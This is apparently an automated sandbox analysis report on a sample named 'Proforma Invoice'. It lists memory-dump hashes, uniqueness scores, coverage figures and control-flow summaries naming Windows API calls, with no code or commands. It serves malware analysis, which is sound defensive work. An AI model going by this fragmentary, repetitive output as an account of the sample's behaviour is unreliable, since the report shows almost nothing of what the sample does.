                                                                                                    • Instruction ID: 7cf1b628cba1d1c044baaf9ece181295de8e4e38dd4fb002b7b022293d0c3c63
                                                                                                    • Opcode Fuzzy Hash: b4e6d8c8d5f82f364eebd7bd30d33c01a8b9c2b954824150c501fb378a464070
                                                                                                    • Instruction Fuzzy Hash: 486107B0E14209DFCB04CFAAD5819AEFBF6BF88304F14906AD525BB254D7349A45CF94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: L;p
                                                                                                    • API String ID: 0-1047063510
                                                                                                    • Opcode ID: 39b79176fbbab45e1d2bab32ada7d5c5377fe083c73811a6c9c7012322493c41
                                                                                                    • Instruction ID: b336940226a04f164b789c9129e7396c61e887cefb85bd3401bcc31f7ceec101
                                                                                                    • Opcode Fuzzy Hash: 39b79176fbbab45e1d2bab32ada7d5c5377fe083c73811a6c9c7012322493c41
                                                                                                    • Instruction Fuzzy Hash: E8512970E14209DFCB04CFAAD5819AEFBF6BF89300F14906AD525EB254E7349A46CF94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b87137a3c87e19801c91fd4fa4f142a9df5c9e346624bff4a9b72bed36405fb6
                                                                                                    • Instruction ID: d94ee6f7f81657676216ebd82fd923c063571effe8f2eb6665d716614d20f6fc
                                                                                                    • Opcode Fuzzy Hash: b87137a3c87e19801c91fd4fa4f142a9df5c9e346624bff4a9b72bed36405fb6
                                                                                                    • Instruction Fuzzy Hash: 33D15B72E04219DFCF18CFA6D9846AEFBB6FF89300F14952AD515AB254DB349902CF40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a260a27af1ff00f3fe1c154910c324cbb07baca51aa91fb2d6bce1adea060cf2
                                                                                                    • Instruction ID: 56fb9869c375dc7d1d254b452766ef320dafa3cb38eb16983caa35bff9536d3a
                                                                                                    • Opcode Fuzzy Hash: a260a27af1ff00f3fe1c154910c324cbb07baca51aa91fb2d6bce1adea060cf2
                                                                                                    • Instruction Fuzzy Hash: ECB12772D1421DEFCB18CFA6D981A9EFBB6FF89300F14942AD515A7264DB359902CF04
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 63db5e3d68b0ceaf33cc517c5f7161943d801e91b41b9bd372d450ee3ff055bd
                                                                                                    • Instruction ID: dc363bc28b85274f48f88a7a7ef4b84024aeb8a295d1691cd09227f7d6ec374b
                                                                                                    • Opcode Fuzzy Hash: 63db5e3d68b0ceaf33cc517c5f7161943d801e91b41b9bd372d450ee3ff055bd
                                                                                                    • Instruction Fuzzy Hash: 7F91D270E04609CFDB08CFE9D984AAEFBB2AF89300F14912AD519BB364D7349946CF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f0656e8676aa6990417ab0c8c633654c6c70caa2890b68f9350784b91e0cc7d2
                                                                                                    • Instruction ID: 3dc20d16c08f45c7cce54633d57572b8a2a43a1f3d9f24628f2528cf7e17c191
                                                                                                    • Opcode Fuzzy Hash: f0656e8676aa6990417ab0c8c633654c6c70caa2890b68f9350784b91e0cc7d2
                                                                                                    • Instruction Fuzzy Hash: 7181E074A14209DFCB54CFA9D5849AEFBF2FF88310F14955AE519AB225D330AA42CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4605984ea37c8a35d8316f3ecab4bf55ce8a1f8e3aee72bf42a384429eafb549
                                                                                                    • Instruction ID: bad6b4e1690b1bf75563576fde00698f260686fcb6b284c2263d9c53ec538ea0
                                                                                                    • Opcode Fuzzy Hash: 4605984ea37c8a35d8316f3ecab4bf55ce8a1f8e3aee72bf42a384429eafb549
                                                                                                    • Instruction Fuzzy Hash: B081E074E14209CFCB44CFA9C5859AEFBF2FF88310F24956AE515AB265D334AA42CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a2a32515f88f41fb2383686d9c9afdb0f3e98f83b54cda577631be5f4665835a
                                                                                                    • Instruction ID: 0b7b0a101cefc42d6a02b8f517864996b03c907d3324842324c6572524449a6a
                                                                                                    • Opcode Fuzzy Hash: a2a32515f88f41fb2383686d9c9afdb0f3e98f83b54cda577631be5f4665835a
                                                                                                    • Instruction Fuzzy Hash: 5B71F570E15209DFCF08CFAAD5828EEFBF6EF89310F24952AD515B7214D7349A418B64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ae3612c21b05dd1d2e83129df4327addb97f40224e226691e4b81e7434f3b387
                                                                                                    • Instruction ID: dae331678e2b3fa1c812203612c1864ae6b03e34369eb660af23601e93309fa6
                                                                                                    • Opcode Fuzzy Hash: ae3612c21b05dd1d2e83129df4327addb97f40224e226691e4b81e7434f3b387
                                                                                                    • Instruction Fuzzy Hash: BD711574E15209DFCF08CFA9D9829EEFBF2EF88310F24942AD505B7224D7349A418B64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 398e7646fd765f65fe66270dd470c219a3fc7a97ab9eba72528a7c58a736e451
                                                                                                    • Instruction ID: 526b95a0332da8fff61ba743d3ef28bf5a36b62319e57459e1f41fe804f95f3b
                                                                                                    • Opcode Fuzzy Hash: 398e7646fd765f65fe66270dd470c219a3fc7a97ab9eba72528a7c58a736e451
                                                                                                    • Instruction Fuzzy Hash: A031AF72D096589FDB09CF6AD8416DEBFB7EBC6200F18C0ABD508EB255D7314906CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5e8c576dae3bc796eb9fe505c89a72d22966d092caadb3515aa90a6e6fa0fa39
                                                                                                    • Instruction ID: 492ce0f8829647a38aa471c00857ffb96cd508a1550911afb7fcb759bb25c455
                                                                                                    • Opcode Fuzzy Hash: 5e8c576dae3bc796eb9fe505c89a72d22966d092caadb3515aa90a6e6fa0fa39
                                                                                                    • Instruction Fuzzy Hash: BD215C71E196089BDB09CF6BD94169EBBF7AFC9200F19C06BD408E7254EA3049418B51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 53ccdcd6baa0985b994d05b61a12cfec9f5afbf88ae03cad7b34486198d8f3bd
                                                                                                    • Instruction ID: 4471853120452b0395c54924b2ee1d2f22729e9ff5958843d197c07b3bf8b22b
                                                                                                    • Opcode Fuzzy Hash: 53ccdcd6baa0985b994d05b61a12cfec9f5afbf88ae03cad7b34486198d8f3bd
                                                                                                    • Instruction Fuzzy Hash: 41211871E106189BEB18CFABD8406DEFBF7AFC8310F14C16AD508A6258DB701A55CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c89c2d92250b9549900f9337700dc2896737366de5828661339edea5a191633e
                                                                                                    • Instruction ID: 6a83c285dd87669491afc2301df1ffda43537ea669d78682d1992fe875d735fe
                                                                                                    • Opcode Fuzzy Hash: c89c2d92250b9549900f9337700dc2896737366de5828661339edea5a191633e
                                                                                                    • Instruction Fuzzy Hash: 8E21B971E156189BEB58CF6BD84069EFBF7AFC8204F04C17AD508A6264EB301956CF51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d0f0e84b3e9b28de28f8f3367af3250752676388635d4c3138e1478993263a7e
                                                                                                    • Instruction ID: 5c41569cc24fedb12398ffb45170a0c1fd0232430531f04abe21ce7b19a08528
                                                                                                    • Opcode Fuzzy Hash: d0f0e84b3e9b28de28f8f3367af3250752676388635d4c3138e1478993263a7e
                                                                                                    • Instruction Fuzzy Hash: F121F471E156199BEB08CFABE9416DEFBF7EBC8300F14C02AD508A7254EB705A518B51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a9e0e0ef3f1a1ab3ce5a8bfdc8d9f2f2c570c00b2b7e34c7e59269f85ce1f3c5
                                                                                                    • Instruction ID: 99a39d936b067b93b81634fa1398d48d725e120dea474f140df5a644add7809f
                                                                                                    • Opcode Fuzzy Hash: a9e0e0ef3f1a1ab3ce5a8bfdc8d9f2f2c570c00b2b7e34c7e59269f85ce1f3c5
                                                                                                    • Instruction Fuzzy Hash: FB110771E146189BEB1CCFABD84159EFBF7AFC8300F04C43AD918A6258DF3409568B51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f74ca6eb71218ace0d71b2ffed8779126cd9891515f29a9837d45deda6c98a9d
                                                                                                    • Instruction ID: b9568413ea14594c343ce1d3c448f1c50dfb326fa67f5f474423d04d7412054e
                                                                                                    • Opcode Fuzzy Hash: f74ca6eb71218ace0d71b2ffed8779126cd9891515f29a9837d45deda6c98a9d
                                                                                                    • Instruction Fuzzy Hash: 70111771E142199BEB58CFABD9416AEFBF7FBC8200F14C02AD508A7254DB305A518F51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d62e26853fee8044016616d043c922c9f7196d9524aebb702255e34d0555b4cc
                                                                                                    • Instruction ID: b7b03a2edbc33200d7ba0c0e59e3712366a49307ee141d60a504fb3a7da07e3f
                                                                                                    • Opcode Fuzzy Hash: d62e26853fee8044016616d043c922c9f7196d9524aebb702255e34d0555b4cc
                                                                                                    • Instruction Fuzzy Hash: 5D21EDB1E106189BEB18CFA6D94479EBFF7AFC8300F14C16AD408A6354DB745955CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c26b2417bedeef178c1a2bbdb98356d67cdbae0498e78bdecf9ee3cec6b15b4d
                                                                                                    • Instruction ID: 94fabff6058e3dc26c5ca6e34efef71f760f801ac75821616d708c3a925be284
                                                                                                    • Opcode Fuzzy Hash: c26b2417bedeef178c1a2bbdb98356d67cdbae0498e78bdecf9ee3cec6b15b4d
                                                                                                    • Instruction Fuzzy Hash: 58113A70E142189BEB58CF6BD94169EFBF3AFC9300F14C03AD408A7254EB704A468F51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e9d500b5547361ab23bca2aefbb4ead6209940e02c9df319822bea3fa62d1f08
                                                                                                    • Instruction ID: f943f5df58318ec2995c34dbada179fe79f6819c1ef78a45af741c06a7bcc310
                                                                                                    • Opcode Fuzzy Hash: e9d500b5547361ab23bca2aefbb4ead6209940e02c9df319822bea3fa62d1f08
                                                                                                    • Instruction Fuzzy Hash: 25114971E046089BEB0CCFABD8401AEFBF3AFC8300F08C47AD818A6268DF3405128B10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 032916464882f6c082a0851b6e97cdd413eb7b3f8823f0f9733c8bc1ca5f8470
                                                                                                    • Instruction ID: c4642d5f320540e2977d74fab3d8b9c5c39aa54e9a75b8301e05d2c5e09e9766
                                                                                                    • Opcode Fuzzy Hash: 032916464882f6c082a0851b6e97cdd413eb7b3f8823f0f9733c8bc1ca5f8470
                                                                                                    • Instruction Fuzzy Hash: E911C171E14A189BEB18CFABD94079EFBF3AFC8201F08C57AC518B6254EB3405568F15
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:13.7%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:6.2%
                                                                                                    Total number of Nodes:48
                                                                                                    Total number of Limit Nodes:2
                                                                                                    execution_graph: node/edge dump of the rendered graph omitted; API calls reached from the graphed functions: CallWindowProcW, LoadLibraryExW, OleInitialize, LdrInitializeThunk, CreateWindowExW.

                                                                                                    Control-flow Graph (rendered image omitted; legend: Executed / Not Executed). Entry block 67da4c0, blocks through 67da6a0; API call: LdrInitializeThunk; internal calls to 67da0b0.
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646919926.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_67d0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 47120b074a864024bb9d434d6e5a19f0fd8a85257369471b40e227f171dbb80e
                                                                                                    • Instruction ID: 48c0bfcb90029103ce914c154d4fe52641ff2afb050f2643992f49f8dc8f200b
                                                                                                    • Opcode Fuzzy Hash: 47120b074a864024bb9d434d6e5a19f0fd8a85257369471b40e227f171dbb80e
                                                                                                    • Instruction Fuzzy Hash: 55518130A102059FCB54EFB4D898AAEB7B5BF88214F04C979D5169B391EF30D844CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3b99038a374506816540c00ef596fe521c039334538a70606b4c89f5f04bb383
                                                                                                    • Instruction ID: 4aa5759d3c7f74f06c84c199dbed4855555bb2fecb3393a2defb4692975ab662
                                                                                                    • Opcode Fuzzy Hash: 3b99038a374506816540c00ef596fe521c039334538a70606b4c89f5f04bb383
                                                                                                    • Instruction Fuzzy Hash: 74B22330F442458FEBA4EB78C894BBEBBA2EB85314F148569E50ADB391DB34DC41C791
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 845f7377e3370e0b055423cb315c2cdb442f4e474a32015d0b9619d51b612fce
                                                                                                    • Instruction ID: 6f50d1ee6218a3156b0f810dac9e06b314d19ddd9a3695230c7e54fc6d194d7c
                                                                                                    • Opcode Fuzzy Hash: 845f7377e3370e0b055423cb315c2cdb442f4e474a32015d0b9619d51b612fce
                                                                                                    • Instruction Fuzzy Hash: 0642A330E44248CFEB64EBA8C494BBEBBB2AF85304F24C569D509AF285DB35DC45CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3b0d68a3d208c94e94d4d923caebf7b760995c35c0e95791f0880b22c98a0679
                                                                                                    • Instruction ID: ca65ea7418f78132303cf052c4e7d051b7757edb6161f623ec8bdd80ef1c6b70
                                                                                                    • Opcode Fuzzy Hash: 3b0d68a3d208c94e94d4d923caebf7b760995c35c0e95791f0880b22c98a0679
                                                                                                    • Instruction Fuzzy Hash: 6DF16F30E402099FDB94EFB8C5886ADB7F2AF88314F248665D915EB395DB31DC42CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 289ba7e1229b8179362d3aa0b2a9a7470e1783a19d26331af6fe9a1b38c0c9bf
                                                                                                    • Instruction ID: 8a7e7b61cf8be7b67f91e547c718bf373efa4bdbf2d60d25a2d288f9ecccd16c
                                                                                                    • Opcode Fuzzy Hash: 289ba7e1229b8179362d3aa0b2a9a7470e1783a19d26331af6fe9a1b38c0c9bf
                                                                                                    • Instruction Fuzzy Hash: 4BC1D230F402188FDBA4EB74C858B7EBAE6AF85704F158469C50AAB391DF71DC45CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph (rendered image omitted; legend: Executed / Not Executed). Entry block 69653c8, blocks through 6965638; API call: GetModuleHandleW; internal calls to 69648e4, 6965641, 69648f0, 69629e4, 6964900.
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.647504901.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6960000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 4139908857-0
                                                                                                    • Opcode ID: 160cdc1d555630ddf78bf4a2c18c5e3bf77e0af65f32fe44538ee84fd96ae008
                                                                                                    • Instruction ID: e473eb3e635f469f60e4e675cdc1e37efcd8ee38ea95817ff8182ef28c98424b
                                                                                                    • Opcode Fuzzy Hash: 160cdc1d555630ddf78bf4a2c18c5e3bf77e0af65f32fe44538ee84fd96ae008
                                                                                                    • Instruction Fuzzy Hash: 33715570A00B058FD7A4DF2AD54076AB7F5BF88204F10892EE48ADBA40DB75E859CF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph (rendered image omitted; legend: Executed / Not Executed). Entry block 67da4b0 (with a branch to 67da454), blocks through 67da6a0; API call: LdrInitializeThunk; internal calls to 67da0b0.
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646919926.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_67d0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: bde1fbb641bd9cd2887874aa68ff769da7e89392655def8c876c529b45746fcd
                                                                                                    • Instruction ID: ff73f74084d5e0a611707d00b0255027e421f38cb8a8bfd1656cb1771d9a7c01
                                                                                                    • Opcode Fuzzy Hash: bde1fbb641bd9cd2887874aa68ff769da7e89392655def8c876c529b45746fcd
                                                                                                    • Instruction Fuzzy Hash: 4F519130A102059FCB54EFB4D858AAEB7F5BF88204F14CD39E5169B751EF30D8458BA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph (rendered graph not extracted; node/edge dump omitted): 11 basic blocks between 6967806 and 6967989. CreateWindowExW is called from block 69678db-696793a; the final block 6967989 branches to itself.
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0696792A
Memory Dump Source
• Source File: 00000008.00000002.647504901.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6960000_Proforma Invoice.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 897c3878255d0ac53b084f6e522fc6a76b6f71ce9fe7336ac54fa43b5540a7cd
• Instruction ID: 154f9b3dcb1b5b8a05772c5e59e44e193d3c3d61b7b8bf7284e7ed063739f208
• Opcode Fuzzy Hash: 897c3878255d0ac53b084f6e522fc6a76b6f71ce9fe7336ac54fa43b5540a7cd
• Instruction Fuzzy Hash: 0451C0B1D103499FDB14CFAAC884ADEBFB5BF48314F24862AE819AB210D7759845CF90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph (rendered graph not extracted; node/edge dump omitted): 10 basic blocks between 6967818 and 6967989. CreateWindowExW is called from block 696789b-696793a; the final block 6967989 branches to itself.
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0696792A
Memory Dump Source
• Source File: 00000008.00000002.647504901.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6960000_Proforma Invoice.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 054964e5fe447b36781e598af464387cc6fb5d30cf86a5953075a5c4909cbb8b
• Instruction ID: aa0aa38aa04fcee327c0e966ed10a930aee3ad76c6e4a0cb76ef5124d9b3eeea
• Opcode Fuzzy Hash: 054964e5fe447b36781e598af464387cc6fb5d30cf86a5953075a5c4909cbb8b
• Instruction Fuzzy Hash: 2541CEB1D10309DFDB14CFAAC984ADEBBF5BF48314F24862AE819AB210D7759845CF90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph (rendered graph not extracted; node/edge dump omitted): 10 basic blocks between 696972c and 696b47c. CallWindowProcW is called from block 696b3fa-696b432; the internal routine 6964a8c is called from block 696b44c-696b46c.
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 0696B421
Memory Dump Source
• Source File: 00000008.00000002.647504901.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6960000_Proforma Invoice.jbxd
